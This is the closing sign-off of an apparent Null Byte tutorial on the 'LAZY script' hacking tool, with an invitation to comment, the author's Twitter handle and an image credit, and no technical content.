I hope you liked this tutorial on installing, configuring and hacking with LAZY script! If you have questions about this tutorial or LAZY script, do not hesitate to leave a comment or contact me on Twitter @KodyKinzie .

Cover image and screenshots by Kody/Null Byte (unless otherwise stated)
